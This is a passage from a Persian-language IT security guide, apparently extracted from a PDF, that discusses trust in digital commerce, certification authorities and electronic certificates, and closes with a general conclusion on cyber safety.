‫ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺩ‪ ،‬ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻓـﻮﺕ ﻭ‬
‫ﻓﻨﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻳﺎ ﺩﻳﮕﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ‬
‫ﺭﻭﺷﻬﺎﻳﻲ ﺗﻬﻴﻪ ﻭ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛـﻪ ﻣﻮﺟـﺐ ﺗﺨﺮﻳـﺐ ﺷـﺪﻳﺪ ﺁﻥ‬
‫ﺗﺠﺎﺭﺕ ﻭ ﺻﻨﻌﺖ ﮔﺮﺩﺩ‪ .‬ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺑﺎ ﺍﺭﺯﺵ ﻧﻴﺎﺯ ﺑـﻪ ﺣﻔﺎﻇـﺖ‬
‫ﻛﺎﻓﻲ ﻭ ﻣﻨﺎﺳﺐ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻗﺮﺍﺭ‬
‫ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛﺎﺭ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﻗﺎﻟـﺐ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﺑﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛﺎﺭ ﺩﺭ‬
‫ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺳﻨﺘﻲ ﺑﻪ ﺗﺠﺎﺭﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪.‬‬
‫ﺑﺴﻮﻱ ﻣﻔﻬﻮﻡ ﻧﻮﻳﻨﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ‬
‫ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺯ ﻣﺎ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺩﺭ ﺗﻌﺮﻳـﻒ ﺧـﻮﺩ ﺍﺯ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺯﻧﮕﺮﻱ ﻛﻨﻴﻢ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻴﺰﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺑـﻪ ﻳـﻚ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬
‫ﺁﻧﻬﺎ ﻫﻢ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻮﺟـﻮﺩ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻳﻚ ﺭﺍﻫﻜـﺎﺭ ﺟـﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﻳﺖ‬
‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺧﺮﻳﺪ ﻣﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺭﻭﺷـﻲ ﻛـﻪ ﺍﮔـﺮ ﺑـﺪﻭﻥ‬
‫ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﺷﻬﺎﻱ‬
‫ﺟﺪﻳﺪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺯ ﺑﮕﺬﺍﺭﺩ‪.‬‬
‫‪٤٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻼ ﺍﺯ‬
‫ﺷﺨﺺ‪ ،‬ﻳﻚ ﻓﺮﺁﻳﻨﺪ‪ ،‬ﻳﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ؛ ﻣـﺜ ﹰ‬
‫ﺗﻄﺎﺑﻖ ﻣﺸﺎﻫﺪﺍﺕ ﻓﻌﻠﻲ ﺑﺎ ﺗﺠﺮﺑﻴﺎﺕ ﻭ ﺩﺍﻧـﺴﺘﻪﻫـﺎﻱ ﻗﺒﻠـﻲﻣـﺎﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﻢ‪ .‬ﺣـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﺑﻴﺸﺘ ﹺﺮ ﺷﺎﺧﺼﻬﺎﻱ ﻏﻴﺮ ﺷﻔﺎﻫﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺯ ﺩﺳـﺖ ﻣـﻲﺭﻭﻧـﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨـﻴﻢ ﻳـﺎ ﺻـﻔﺤﺔ‬
‫ﻭﺑﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﻴﻢ‪ ،‬ﻧﻤﻲﺗﻮﺍﻧﻴﻢ ﻫﻤﻴﺸﻪ ﺑﮕﻮﺋﻴﻢ ﻛﻪ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﻗﻴﻖ ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﺮﺩﻳﻢ ﻣﺸﺨﺺ ﻣﻲﺷﺪ ﻛـﻪ‬
‫ﺻﺤﻴﺢ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲ ﺩﺍﻧﻴﻢ ﻛـﻪ ﺧﻄﺎﻫـﺎﻱ ﻭﺍﻗـﻊﺷـﺪﻩ‬
‫ﻧﺘﻴﺠﻪ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻳﺎ ﺗﻼﺷﻬﺎﻳﻲ ﺗﻌﻤﺪﻱ ﺑـﺮﺍﻱ ﻓﺮﻳـﺐ‬
‫ﺩﺍﺩﻥ ﻣﺎ‪ .‬ﺩﺭ ﻏﻴﺎﺏ ﺍﻃﻼﻋﺎﺕ ﺣﺘـﻲ ﺩﻳﮕـﺮ ﻧﻤـﻲﺩﺍﻧـﻴﻢ ﻛـﻪ ﺁﻳـﺎ‬
‫ﻧﻮﻳﺴﻨﺪﺓ ﻳﻚ ﭘﻴﺎﻡ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋﺎﻱ ﺁﻧﺮﺍ‬
‫ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﻣﺴﻠﻢ ﺍﺳﺖ ﻛﻪ ﻓﺮﻳﺒﻜﺎﺭﻱ ﺩﺭ ﺟﻬﺎﻥ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﺭﺥ ﻣـﻲ ﺩﻫـﺪ‪،‬‬
‫ﻻ ﺗﻌﻴـﻴﻦ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺍﻓـﺮﺍﺩ ﺑـﺼﻮﺭﺕ‬
‫ﻭﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﻜﺎﻧﻬﺎ ﺑﺼﻮﺭﺕ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪ ٦٥‬ﺑـﻪ ﺍﻳـﻦ ﺑﻌـﺪ ﺍﺯ‬
‫ﺍﻣﻨﻴﺖ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﺯﻳﺎﺩﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺮﺍﻛﺰ ﺑـﺮﺍﻱ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﻃـﻮﺭ ﺭﺳـﻤﻲ ﮔـﻮﺍﻫﻲ ﺻـﺎﺩﺭ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻔﻬـﻮﻡ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺍﮔـﺮ‬
‫ﮔﺬﺭﻧﺎﻣﺔ ﻣﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﻌﻨﻲ ﺩﻭﻟﺖ ﻳﻚ ﻛﺸﻮﺭ ﻫﻮﻳﺖ ﺷـﻤﺎ‬
‫ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﻭ ﻟﺬﺍ ﮔﺬﺭﻧﺎﻣﻪ ﻧﺸﺎﻧﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﻴـﺪ‬
‫ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺍﮔﺮ‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺳﻴﻠﺔ ﻧﻘﻠﻴﺔ ﻣﻮﺗﻮﺭﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ‬
‫ﻱ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ ﺷـﻤﺎ‬
‫ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﻣﻠـﻲ ﻳـﺎ ﻧﺎﺣﻴـﻪﺍ ﹺ‬
‫ﻣﺠﻮﺯﻱ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﻛﻪ ﻫﻢ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻭ ﻫـﻢ‬
‫ﺟﻮﺍﺯ ﺭﺍﻧﻨـﺪﮔﻲ ﺑـﺎ ﻳـﻚ ﻭﺳـﻴﻠﺔ ﻧﻘﻠﻴـﻪ ﺭﺍ ﺑـﻪ ﺷـﻤﺎ ﻣـﻲﺩﻫـﺪ‪.‬‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻲﺩﻫﻨﺪ ﻧﻴـﺰ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﻛﺎﺭﻓﺮﻣـﺎ ﻳـﺎ‬
‫ﺁﻣﻮﺯﺷﮕﺎﻩ ﺷﻤﺎ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﺭﺕ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﻭ ﺁﻥ ﻛﺎﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﺷﻤﺎ ﺭﺍ ﺑـﻪ‬
‫ﺳﺮﻭﻳﺴﻬﺎﻱ ﺧﺎﺻﻲ ﻛﻪ ﻣﺨﺼﻮﺹ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻳـﺎ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ‬
‫ﻳﻚ ﺣﻮﺯﺓ ﺧﺎﺹ ﻫﺴﺘﻨﺪ ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻣﺮﻛﺰ ﺗﺎ ﻣﺮﻛﺰ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ؛ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﻪ ﺍﺛﺒﺎﺕ ﻛﺎﻣﻞ ﻫﻮﻳﺖ ﺷﻤﺎ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﺎﻳﺮﻳﻦ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﻛﻪ ﺑﻴﺎﻥ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﭙﺬﻳﺮﻧﺪ‪.‬‬
‫ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﻳـﻦ ﻣﺸﺨـﺼﺎﺕ ﺭﺍ ﺑـﻪ‬
‫ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺳﻄﻮﺡ ﻣﺘﻌﺪﺩ ﺗﺄﻳﻴﺪ ﻫﻮﻳـﺖ ﺑـﺮﺍﻱ ﺩﺭﺟـﺎﺕ‬
‫ﻣﺨﺘﻠﻒ ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻴﻬﺎ ﺗﻨﻬـﺎ‬
‫ﺩﺭ ﺳﻄﺢ ﺧﻮﺩ ﻣﻌﺘﺒﺮ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻟﺬﺍﺳﺖ ﻛﻪ ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﻭﺟﻮﺩ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ‬
‫ﺑﻪ ﺗﻤﺎﻣﻲ ﺍﻫﺪﺍﻑ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﻓﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﭼﻨـﺪﻳﻦ ﻣﺮﻛـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎ‬
‫ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﮔــﻮﺍﻫﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،٦٦‬ﺍﻳــﻦ ﮔﻮﺍﻫﻴﻬــﺎ ﻣــﻲﺗﻮﺍﻧﻨــﺪ‬
‫ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﺷﻮﻧﺪ ﻭ ﺍﻳﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ‬
‫ﻛــﻪ ﮔــﻮﺍﻫﻲ ﻣﻨﺘﻘــﻞ ﺷــﺪﻩ ﺻــﺤﻴﺢ ﻭ ﺣﻘﻴﻘــﻲ ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺗﺠﺮﺑﻲ ﻭ ﺷـﻬﻮﺩﻱ ﻛـﻪ‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻣـﺴﺘﺤﻜﻢﺗـﺮ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻋﺘﻤﺎﺩ ﻻﺯﻡ ﺟﻬـﺖ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣـﺎﻟﻲ‬
‫ﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‪ ،‬ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺭﻭﺷــﻬﺎﻱ‬
‫ﻣﺴﺘﺤﻜﻢﺗﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﺑـﺮﺍﻱ‬
‫ﻛﺎﺭﺍﻳﻲ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﻣﺪﻟﻬﺎﻱ ﺟﺪﻳﺪ ﺍﻋﺘﻤﺎﺩ ﻧﻘﺶ‬
‫ﻣﻬﻤﻲ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ‬
‫ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﺘﻪ ﺑﻪ ﻭﺟﻮﺩ ﺍﻳﻦ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌﻀﻲ‬
‫ﻛﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬﺎ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ‬
‫ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻋﻤﻞ ﻛﻨﻨـﺪ ﻭ ﺩﺭ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬـﺎ‬
‫ﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻭﻇﻴﻔـﺔ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺑﺎﻳـﺪ ﺑـﻪ ﺑﺨـﺶ‬
‫ﺧﺼﻮﺻﻲ ﻭﺍﮔﺬﺍﺭ ﺷﻮﺩ‪ .‬ﻣﺴﺘﻘﻞ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ‪ ،‬ﻫﺪﻑ ﺍﺯ‬
‫ﺗﺄﺳﻴﺲ ﺍﻳﻦ ﻣﺮﺍﻛـﺰ ﻭﺍﺿـﺢ ﺍﺳـﺖ‪ .‬ﺳﻴﺎﺳـﺖ ﺩﻭﻟـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺗﺴﻬﻴﻞ ﻛﻨﺪ ﺗﺎ ﺍﻓﺮﺍﺩ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ‬
‫ﻲ‬
‫ﻛــﺎﺭﺑﺮﺍﻥ ﻣﻨﻔــﺮﺩ ﺁﻥ ﻗــﺎﺩﺭ ﺑﺎﺷــﻨﺪ ﺩﺭ ﺗﺠــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــ ﹺ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻢ ﻣﺸﺎﺭﻛﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ‬
‫ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ﺍﺯ ﺗﺄﻳﻴـﺪ ﺷـﻤﺎ‬
‫ﻫﺪﻑ ﺧﺎﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺟﺎﻣﻌﻴﺖ ﺗﺄﻳﻴﺪ ﻫﻮﻳﺖ ﺍﺯ ﻳـﻚ‬
‫‪Certification Authorities‬‬
‫‪65‬‬
‫‪Electronic Certification‬‬
‫‪66‬‬
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺟﻤﻊﺑﻨﺪﻱ‬
‫ﺗﻤﺎﻡ ﺍﻓﺮﺍﺩ ﻭ ﻛﺸﻮﺭﻫﺎ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻬﺮﻩ ﻣﻲﺟﻮﻳﻨـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺟﺎﺫﺑﺔ ﺧﺎﺻﻲ ﺩﺍﺭﺩ‬
‫ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﺁﻧﻬﺎ ﺩﺭ ﺟﺎﻣﻌﺔ ﺍﻗﺘـﺼﺎ ‪‬ﺩ ﺟﻬـﺎﻧﻲ ﺭﺍ ﺗـﺴﺮﻳﻊ‬
‫ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻫﻨﻮﺯ ﺩﺭ ﺁﻏﺎﺯ ﺭﺍﻩ ﺧـﻮﺩ ﺍﺳـﺖ ﻭﻟـﻲ ﺑـﺴﺮﻋﺖ‬
‫ﺩﺭﺣﺎﻝ ﭘﻴﺸﺮﻓﺖ ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺎﻧﻨﺪ ﺳـﺎﻳﺮ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ‬
‫ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣـﺸﺮﻭﻉ ﻭ ﻫـﻢ‬
‫ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻧﺎﻣﺸﺮﻭﻉ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺠﺮﻣﺎﻥ ﻭ ﺧﺮﺍﺑﻜـﺎﺭﺍﻧﻲ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻣﻔﻬﻮﻡ "ﺍﻳﻤﻨﻲ ﺳﺎﻳﺒﺮ" ﻳﻚ ﻣﻔﻬﻮﻡ ﻣﻬـﻢ ﺍﺳـﺖ‪ .‬ﻣﺜﺎﻟﻬـﺎﻱ ﺍﻳـﻦ‬
‫ﻓﺼﻞ‪ ،‬ﻣﻴﺰﺍﻥ ﻭﻗﺎﻳﻊ ﮔـﺰﺍﺭﺵﺷـﺪﻩ ﺑـﻪ ‪ ،CERT‬ﻭ ﺭﺧـﺪﺍﺩﻫﺎﻱ‬
‫ﺟﺪﻳﺪﻱ ﻛﻪ ﺭﻭﺯﺍﻧﻪ ﺩﺭ ﻣﻄﺒﻮﻋـﺎﺕ ﮔـﺰﺍﺭﺵ ﻣـﻲﺷـﻮﻧﺪ ﻫﻤﮕـﻲ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﭼـﺮﺍ ﺁﮔـﺎﻫﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺣـﺎﺋﺰ‬
‫ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻭ ﭼﺮﺍ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ‬
